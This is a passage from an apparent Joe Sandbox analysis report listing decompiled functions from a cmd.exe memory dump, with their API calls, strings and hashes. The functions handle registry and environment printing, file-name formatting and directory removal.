                                    • Instruction Fuzzy Hash: F0410379A0011286EF2CDBACE88527FB7B5BF55204715443EEF46DBA85EB30D982C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E011F4B4E(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t24;
				signed int _t26;
				signed int _t31;
				void* _t39;
				void* _t42;
				int _t43;
				signed int _t53;
				signed int _t54;
				int _t59;
				void* _t64;
				int* _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t80;

				_t63 = __edx;
				_t19 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t19 ^ _t70;
				_t67 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					_t43 = E011DDF40(E011DDEF9(__edx));
					__eflags = _t43;
					if(_t43 == 0) {
						L14:
						_t24 = 1;
						L28:
						__eflags = _v8 ^ _t70;
						return E011E6FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
					}
					_t64 = 0x20;
					_t26 = E011E2349(_t43, _t64);
					__eflags = _t26;
					if(__eflags != 0) {
						__eflags = 0;
						 *_t26 = 0;
					}
					_t50 = _t67;
					_t63 = E011F5662(_t43, _t67, _t43, _t66, _t67, __eflags);
					_v532 = _t63;
					__eflags = _t63;
					if(_t63 == 0) {
						L25:
						_t67 = 1;
						__eflags = 1;
						E011DC5A2(_t50, 0x400023a3, 1, _t43);
						goto L26;
					} else {
						_t53 = _t63;
						_t66 = 0;
						__eflags = 0;
						_t16 = _t53 + 2; // 0x2
						_t69 = _t16;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
							__eflags = _t31;
						} while (_t31 != 0);
						_t54 = _t53 - _t69;
						__eflags = _t54;
						_t50 = _t54 >> 1;
						if(_t54 == 0) {
							goto L25;
						}
						_push(_t63);
						_push(_t43);
						_t67 = E011E25D9(L"%s=%s\r\n");
						L26:
						E011E0040(_v532);
						E011E0040(_t43);
						L27:
						_t24 = _t67;
						goto L28;
					}
				}
				_t66 = 0;
				_t43 = 0;
				_v536 = 0;
				while(1) {
					_v540 = 0x104;
					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
					if(_t67 != 0) {
						break;
					}
					_t76 = _v528 - 0x2e;
					if(_v528 != 0x2e) {
						L10:
						_t80 =  *0x11fd544 - _t66; // 0x0
						if(_t80 != 0) {
							goto L14;
						}
						_t43 = _t43 + 1;
						_v536 = _t43;
						if(_t67 != 0) {
							goto L27;
						}
						_t67 = _v532;
						continue;
					}
					_t56 = _v532;
					_t63 =  &_v528;
					_t43 = E011F5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
					if(_t43 == 0) {
						_push(_t66);
						_push(GetLastError());
						E011DC5A2(_t56);
						goto L14;
					}
					_t59 = _t43;
					_t10 = _t59 + 2; // 0x2
					_t63 = _t10;
					do {
						_t39 =  *_t59;
						_t59 = _t59 + 2;
					} while (_t39 != _t66);
					if(_t59 != _t63) {
						_push(_t43);
						_push( &_v528);
						_t42 = E011E25D9(L"%s=%s\r\n");
						_t71 = _t71 + 0xc;
						_t67 = _t42;
					}
					E011E0040(_t43);
					_t43 = _v536;
					goto L10;
				}
				__eflags = _t67 - 0x103;
				if(_t67 == 0x103) {
					_t67 = _t66;
				}
				goto L27;
			}





























                                    0x011f4b4e
                                    0x011f4b59
                                    0x011f4b60
                                    0x011f4b65
                                    0x011f4b67
                                    0x011f4b70
                                    0x011f4c63
                                    0x011f4c65
                                    0x011f4c67
                                    0x011f4c3a
                                    0x011f4c3c
                                    0x011f4cdf
                                    0x011f4ce4
                                    0x011f4cef
                                    0x011f4cef
                                    0x011f4c6b
                                    0x011f4c6e
                                    0x011f4c73
                                    0x011f4c75
                                    0x011f4c77
                                    0x011f4c79
                                    0x011f4c79
                                    0x011f4c7e
                                    0x011f4c85
                                    0x011f4c87
                                    0x011f4c8d
                                    0x011f4c8f
                                    0x011f4cb9
                                    0x011f4cbc
                                    0x011f4cbc
                                    0x011f4cc3
                                    0x00000000
                                    0x011f4c91
                                    0x011f4c91
                                    0x011f4c93
                                    0x011f4c93
                                    0x011f4c95
                                    0x011f4c95
                                    0x011f4c98
                                    0x011f4c98
                                    0x011f4c9b
                                    0x011f4c9e
                                    0x011f4c9e
                                    0x011f4ca3
                                    0x011f4ca3
                                    0x011f4ca5
                                    0x011f4ca7
                                    0x00000000
                                    0x00000000
                                    0x011f4ca9
                                    0x011f4caa
                                    0x011f4cb5
                                    0x011f4cc8
                                    0x011f4cd1
                                    0x011f4cd8
                                    0x011f4cdd
                                    0x011f4cdd
                                    0x00000000
                                    0x011f4cdd
                                    0x011f4c8f
                                    0x011f4b76
                                    0x011f4b78
                                    0x011f4b7a
                                    0x011f4b80
                                    0x011f4b8a
                                    0x011f4ba4
                                    0x011f4ba8
                                    0x00000000
                                    0x00000000
                                    0x011f4bae
                                    0x011f4bb6
                                    0x011f4c09
                                    0x011f4c09
                                    0x011f4c0f
                                    0x00000000
                                    0x00000000
                                    0x011f4c11
                                    0x011f4c12
                                    0x011f4c1a
                                    0x00000000
                                    0x00000000
                                    0x011f4c20
                                    0x00000000
                                    0x011f4c20
                                    0x011f4bb8
                                    0x011f4bbe
                                    0x011f4bc9
                                    0x011f4bcd
                                    0x011f4c2b
                                    0x011f4c32
                                    0x011f4c33
                                    0x00000000
                                    0x011f4c39
                                    0x011f4bcf
                                    0x011f4bd1
                                    0x011f4bd1
                                    0x011f4bd4
                                    0x011f4bd4
                                    0x011f4bd7
                                    0x011f4bda
                                    0x011f4be3
                                    0x011f4be5
                                    0x011f4bec
                                    0x011f4bf2
                                    0x011f4bf7
                                    0x011f4bfa
                                    0x011f4bfa
                                    0x011f4bfe
                                    0x011f4c03
                                    0x00000000
                                    0x011f4c03
                                    0x011f4c42
                                    0x011f4c48
                                    0x011f4c4e
                                    0x011f4c4e
                                    0x00000000

                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4B9E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4C2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: EnumErrorLast
                                    • String ID: %s=%s$.
                                    • API String ID: 1967352920-4275322459
                                    • Opcode ID: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction ID: 666e5663c9a4e08802e6672649645547f98ad4a168bfce08b4b2956925f350b7
                                    • Opcode Fuzzy Hash: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction Fuzzy Hash: B6416871F0021A87CB3CABAD9CA8BBB76F9EB94314F0501ADDA1A97240DF704E418791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FAB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011FAB79(void* __ecx, char* __edx, signed char* _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				char* _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t39;
				char _t42;
				void* _t44;
				intOrPtr _t47;
				void* _t59;
				signed int _t61;

				_t58 = __edx;
				_t25 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t25 ^ _t61;
				_v28 = _v28 & 0x00000000;
				_t60 = 0x104;
				_v552 = __edx;
				_v20 = 0x104;
				_t46 = 1;
				_t59 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t37 = _a4;
					_t60 = L"%s";
					if(( *_a4 & 0x00000010) != 0) {
						_t60 = L"[%s]";
					}
					_t39 = E011E0D89(_t58, _t37 + 0x2c);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t47 = _v552;
					E011E6810(_t39, _t54, _t47);
					if(_t47 < 0) {
						_t44 = _v28;
						if(_t44 == 0) {
							_t44 =  &_v548;
						}
						__imp___wcslwr(_t44);
					}
					_t41 = _v28;
					if(_v28 == 0) {
						_t41 =  &_v548;
					}
					_t58 = _t60;
					_t42 = E011E6B76(_t59, _t60, _t41);
					_t46 = _t42;
					if(_t42 == 0) {
						_t46 = E011F7D7D(_t59);
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
			}




















                                    0x011fab79
                                    0x011fab84
                                    0x011fab8b
                                    0x011fab8e
                                    0x011fab9b
                                    0x011faba0
                                    0x011faba9
                                    0x011fabae
                                    0x011fabaf
                                    0x011fabb2
                                    0x011fabb5
                                    0x011fabdb
                                    0x011fabdd
                                    0x011fabe0
                                    0x011fabe8
                                    0x011fabea
                                    0x011fabea
                                    0x011fabf9
                                    0x011fabfe
                                    0x011fac03
                                    0x011fac05
                                    0x011fac05
                                    0x011fac0b
                                    0x011fac12
                                    0x011fac19
                                    0x011fac1b
                                    0x011fac20
                                    0x011fac22
                                    0x011fac22
                                    0x011fac29
                                    0x011fac2f
                                    0x011fac30
                                    0x011fac35
                                    0x011fac37
                                    0x011fac37
                                    0x011fac3e
                                    0x011fac42
                                    0x011fac47
                                    0x011fac4b
                                    0x011fac54
                                    0x011fac54
                                    0x011fac4b
                                    0x011fac59
                                    0x011fac72

                                    APIs
                                    • memset.MSVCRT ref: 011FABB5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcslwr.MSVCRT ref: 011FAC29
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAC59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_wcslwr
                                    • String ID: [%s]
                                    • API String ID: 886762496-302437576
                                    • Opcode ID: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction ID: c09e236cb5b70b2300a053064a6c06793fd04e8c558ed09549297d71da787e97
                                    • Opcode Fuzzy Hash: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction Fuzzy Hash: 32217571B002195BDB19DAE4E989BBEBBE8AF58314F4804ADE609D3141EB74DE44CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E62FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmp
                                    • String ID: /-Y$COPYCMD
                                    • API String ID: 1886669725-617350906
                                    • Opcode ID: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction ID: 0c03cfd9843b9412f30f3c6e4ef8bd79977d8261c01111121fc3b547cca2b04f
                                    • Opcode Fuzzy Hash: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction Fuzzy Hash: 9F219B72A08A1297DB2C9B9E984D6BAFAF6EFA5250F950069FC4D97241EF308D41C250
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E23A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • iswspace.MSVCRT ref: 011E23C8
                                    • _wcsnicmp.MSVCRT ref: 011E2419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspace$_wcsnicmp
                                    • String ID: off
                                    • API String ID: 3989682491-733764931
                                    • Opcode ID: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction ID: e69aba4d19a21cf1db1f221edfc95bb234fc90446da2207306f5561b6a4fc8fa
                                    • Opcode Fuzzy Hash: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction Fuzzy Hash: F2114C22704E1256FF3E12EE7C7EF3A55EC9F95959B19002AFD46E60C1EF7089808162
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E011F4506(intOrPtr* __ecx) {
				void* _t5;
				signed int _t6;
				signed int _t8;
				signed int _t9;
				void* _t19;
				signed int _t23;
				intOrPtr* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;

				_t23 = __ecx;
				if(__ecx != 0) {
					_t26 = __ecx;
					__eflags = 0;
					_t19 = __ecx + 2;
					do {
						_t6 =  *_t26;
						_t26 = _t26 + 2;
						__eflags = _t6;
					} while (_t6 != 0);
					while(1) {
						_t27 = _t26 - _t19;
						__eflags = _t27;
						_t28 = _t27 >> 1;
						if(_t27 == 0) {
							break;
						}
						__eflags =  *0x11fd544; // 0x0
						if(__eflags != 0) {
							_t8 = 1;
						} else {
							__eflags =  *_t23 - 0x3d;
							if( *_t23 != 0x3d) {
								_push(_t23);
								E011E25D9(L"%s\r\n");
							}
							_t23 = _t23 + _t28 * 2 + 2;
							__eflags = _t23;
							_t30 = _t23;
							_t19 = _t30 + 2;
							do {
								_t9 =  *_t30;
								_t30 = _t30 + 2;
								__eflags = _t9;
							} while (_t9 != 0);
							continue;
						}
						L12:
						return _t8;
						goto L14;
					}
					_t8 = 0;
					__eflags = 0;
					goto L12;
				} else {
					_push("Null environment");
					fprintf(E011E7721(_t5, 2), "\nCMD Internal Error %s\n");
					return 1;
				}
				L14:
			}













                                    0x011f4509
                                    0x011f450d
                                    0x011f4532
                                    0x011f4534
                                    0x011f4536
                                    0x011f4539
                                    0x011f4539
                                    0x011f453c
                                    0x011f453f
                                    0x011f453f
                                    0x011f4577
                                    0x011f4577
                                    0x011f4577
                                    0x011f4579
                                    0x011f457b
                                    0x00000000
                                    0x00000000
                                    0x011f4546
                                    0x011f454c
                                    0x011f4585
                                    0x011f454e
                                    0x011f454e
                                    0x011f4552
                                    0x011f4554
                                    0x011f455a
                                    0x011f4560
                                    0x011f4564
                                    0x011f4564
                                    0x011f4567
                                    0x011f4569
                                    0x011f456c
                                    0x011f456c
                                    0x011f456f
                                    0x011f4572
                                    0x011f4572
                                    0x00000000
                                    0x011f456c
                                    0x011f457f
                                    0x011f4582
                                    0x00000000
                                    0x011f4582
                                    0x011f457d
                                    0x011f457d
                                    0x00000000
                                    0x011f450f
                                    0x011f450f
                                    0x011f4522
                                    0x011f452f
                                    0x011f452f
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F4522
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __iob_funcfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 620453056-2781220306
                                    • Opcode ID: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction ID: 2455adb61447690e94106b46cdd9ec1ad82f53c622971da49736dc96b39d309f
                                    • Opcode Fuzzy Hash: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction Fuzzy Hash: 40019E77A442118EDB3CBB9C785D5B37354EAD0214315053FEE6693D54FB705942C141
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E011F2950(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				void* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t3 ^ _t20;
				_t18 =  *0x12180a0;
				if(_t18 != 0) {
					L5:
					 *0x12194b4();
					_t6 =  *_t18();
				} else {
					_t8 =  *0x11fd530; // 0x0
					if(_t8 == 0) {
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0x11fd530 = _t8;
					}
					_t18 = GetProcAddress(_t8, "RtlDllShutdownInProgress");
					 *0x12180a0 = _t18;
					if(_t18 != 0) {
						goto L5;
					} else {
						_t6 = 0;
					}
				}
				_pop(_t19);
				return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}














                                    0x011f2955
                                    0x011f2956
                                    0x011f295d
                                    0x011f2961
                                    0x011f2969
                                    0x011f29a0
                                    0x011f29a2
                                    0x011f29a8
                                    0x011f296b
                                    0x011f296b
                                    0x011f2972
                                    0x011f2979
                                    0x011f297f
                                    0x011f297f
                                    0x011f2990
                                    0x011f2992
                                    0x011f299a
                                    0x00000000
                                    0x011f299c
                                    0x011f299c
                                    0x011f299c
                                    0x011f299a
                                    0x011f29af
                                    0x011f29b8

                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 011F2979
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 011F298A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                    • API String ID: 1646373207-582119455
                                    • Opcode ID: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction ID: 214ba48a93f13fbb78718f528236add32a921ae3f11247491a49c13772eb1db1
                                    • Opcode Fuzzy Hash: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction Fuzzy Hash: 1FF09031A20328DB8F39DF69B91D67A37E8FB54A98781025DEC01D7208EF719D418BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D88D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E011D88D8(void* __ecx) {
				signed int _v8;
				void* _v12;
				int _v20;
				signed int _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void _v548;
				void* _v552;
				void* _v556;
				void* _v560;
				int _v564;
				int _v568;
				int _v572;
				char _v576;
				char _v580;
				int _v584;
				int _v588;
				void* _v592;
				void* _v596;
				void* _v602;
				int _v606;
				int _v610;
				int _v614;
				int _v618;
				int _v622;
				int _v626;
				int _v630;
				int _v634;
				short _v636;
				int _v640;
				int _v644;
				int _v648;
				int _v652;
				signed int _v656;
				char _v660;
				signed int _v664;
				char _v668;
				void* _v676;
				void* _v680;
				void* _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				intOrPtr _t79;
				signed int _t82;
				long _t87;
				long _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr* _t106;
				signed int _t107;
				void* _t116;
				intOrPtr _t118;
				WCHAR** _t119;
				void* _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;

				_t127 = (_t125 & 0xfffffff8) - 0x29c;
				_t64 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t64 ^ _t127;
				_v24 = 1;
				_v644 = 0;
				_t93 = __ecx;
				_v636 = 0;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				_v648 = 0;
				_v640 = 0;
				_v634 = 0;
				_v630 = 0;
				_v626 = 0;
				_v622 = 0;
				_v618 = 0;
				_v614 = 0;
				_v610 = 0;
				_v606 = 0;
				asm("stosd");
				_v668 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v588 = 0;
				_v584 = 0;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = 0;
				_v564 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t128 = _t127 + 0xc;
				if(E011E0C70( &_v548, 0x7fe9) < 0) {
					L18:
					_t122 = 1;
				} else {
					_t112 =  &_v660;
					_v664 =  *0x1213cd8;
					_v656 = 6;
					_t122 = 0;
					_v652 = 0;
					_v588 = 0;
					_v568 = 0;
					if(E011D8AD7( &_v660) == 1) {
						goto L18;
					} else {
						_t103 = _v24;
						if(_v24 == 0) {
							_t103 = _t128 + 0x88;
						}
						_t112 =  *((intOrPtr*)(_t128 + 0x298));
						E011E36CB(_t93, _t103,  *((intOrPtr*)(_t128 + 0x298)), 0);
						_t95 = _v588;
						if(_t95 == 0) {
							_push(0);
							goto L30;
						} else {
							_t112 =  &_v580;
							_t118 = _t95;
							do {
								_t106 =  *_t112;
								_v668 = _t106 + 2;
								do {
									_t79 =  *_t106;
									_t106 = _t106 + 2;
								} while (_t79 != _v664);
								_t107 = _t106 - _v668;
								_t103 = _t107 >> 1;
								if(_t107 == 0) {
									_push(0);
									L30:
									_push(0x232a);
									E011DC5A2(_t103);
									goto L18;
								} else {
									goto L8;
								}
								goto L16;
								L8:
								_t112 =  *((intOrPtr*)(_t112 + 0xc));
								_t118 = _t118 - 1;
							} while (_t118 != 0);
							_t119 =  &_v580;
							_t82 = _v656 & 0x00000010;
							_v664 = _t82;
							do {
								if(_t82 == 0) {
									if(RemoveDirectoryW( *_t119) != 0) {
										goto L13;
									} else {
										_t87 = GetLastError();
										_t122 = _t87;
										_push(0);
										_push(_t87);
										goto L28;
									}
									goto L16;
								} else {
									if((_v656 & 0x00002000) == 0) {
										_t112 = 0x234e;
										if(E011F9583( *_t119, 0x234e, 0x2328) == 1) {
											goto L12;
										} else {
											_t122 = 1;
											goto L13;
										}
										goto L16;
									} else {
										L12:
										_t109 =  *_t119;
										_t112 =  &_v668;
										_t91 = E011D85EA( *_t119,  &_v668);
										if(_t91 != 0) {
											if(_t91 != 0x91 || _v668 != 0) {
												_t109 = 0;
												_t122 = _t91;
												_push(0);
												_push(_t91);
												L28:
												E011DC5A2(_t109);
												_pop(_t109);
											}
										}
									}
								}
								L13:
								_t119 = _t119[3];
								_t82 = _v664;
								_t95 = _t95 - 1;
							} while (_t95 != 0);
							_t84 = _v24;
							if(_v24 == 0) {
								_t84 = _t128 + 0x88;
							}
							E011E0BFC(_t84,  *((intOrPtr*)(_t128 + 0x298)));
							E011E2A06(_v668, _t119);
						}
					}
				}
				L16:
				__imp__??_V@YAXPAX@Z(_v28);
				_pop(_t116);
				_pop(_t123);
				_pop(_t94);
				return E011E6FD0(_t122, _t94, _v8 ^ _t128, _t112, _t116, _t123);
			}
































































                                    0x011d88e0
                                    0x011d88e6
                                    0x011d88ed
                                    0x011d88f6
                                    0x011d88ff
                                    0x011d8903
                                    0x011d8907
                                    0x011d890e
                                    0x011d8916
                                    0x011d891a
                                    0x011d891e
                                    0x011d8922
                                    0x011d8926
                                    0x011d892a
                                    0x011d892e
                                    0x011d8932
                                    0x011d8936
                                    0x011d893a
                                    0x011d893e
                                    0x011d8942
                                    0x011d8946
                                    0x011d8947
                                    0x011d894b
                                    0x011d8952
                                    0x011d8953
                                    0x011d8954
                                    0x011d8958
                                    0x011d8960
                                    0x011d8964
                                    0x011d8968
                                    0x011d896c
                                    0x011d8970
                                    0x011d8974
                                    0x011d8978
                                    0x011d8979
                                    0x011d897a
                                    0x011d8981
                                    0x011d8991
                                    0x011d8996
                                    0x011d89ac
                                    0x011d8ad2
                                    0x011d8ad4
                                    0x011d89b2
                                    0x011d89b7
                                    0x011d89bd
                                    0x011d89c3
                                    0x011d89cb
                                    0x011d89cd
                                    0x011d89d1
                                    0x011d89d5
                                    0x011d89e1
                                    0x00000000
                                    0x011d89e7
                                    0x011d89e7
                                    0x011d89f0
                                    0x011f06ab
                                    0x011f06ab
                                    0x011d89f6
                                    0x011d89fe
                                    0x011d8a03
                                    0x011d8a09
                                    0x011f06b7
                                    0x00000000
                                    0x011d8a0f
                                    0x011d8a0f
                                    0x011d8a13
                                    0x011d8a15
                                    0x011d8a15
                                    0x011d8a1a
                                    0x011d8a1e
                                    0x011d8a1e
                                    0x011d8a21
                                    0x011d8a24
                                    0x011d8a2b
                                    0x011d8a2f
                                    0x011d8a31
                                    0x011f0720
                                    0x011f0721
                                    0x011f0721
                                    0x011f0726
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d8a37
                                    0x011d8a37
                                    0x011d8a3a
                                    0x011d8a3a
                                    0x011d8a43
                                    0x011d8a47
                                    0x011d8a4a
                                    0x011d8a4e
                                    0x011d8a50
                                    0x011f0700
                                    0x00000000
                                    0x011f0706
                                    0x011f0706
                                    0x011f070c
                                    0x011f0710
                                    0x011f0711
                                    0x00000000
                                    0x011f0711
                                    0x00000000
                                    0x011d8a56
                                    0x011d8a5e
                                    0x011f06bc
                                    0x011f06ce
                                    0x00000000
                                    0x011f06d4
                                    0x011f06d6
                                    0x00000000
                                    0x011f06d6
                                    0x00000000
                                    0x011d8a64
                                    0x011d8a64
                                    0x011d8a64
                                    0x011d8a66
                                    0x011d8a6a
                                    0x011d8a71
                                    0x011f06e1
                                    0x011f06ee
                                    0x011f06f0
                                    0x011f06f2
                                    0x011f06f3
                                    0x011f0712
                                    0x011f0712
                                    0x011f0718
                                    0x011f0718
                                    0x011f06e1
                                    0x011d8a71
                                    0x011d8a5e
                                    0x011d8a77
                                    0x011d8a77
                                    0x011d8a7a
                                    0x011d8a7e
                                    0x011d8a7e
                                    0x011d8a83
                                    0x011d8a8c
                                    0x011d8ac9
                                    0x011d8ac9
                                    0x011d8a96
                                    0x011d8a9f
                                    0x011d8a9f
                                    0x011d8a09
                                    0x011d89e1
                                    0x011d8aa4
                                    0x011d8aab
                                    0x011d8abb
                                    0x011d8abc
                                    0x011d8abd
                                    0x011d8ac8

                                    APIs
                                    • memset.MSVCRT ref: 011D8991
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D8AAB
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
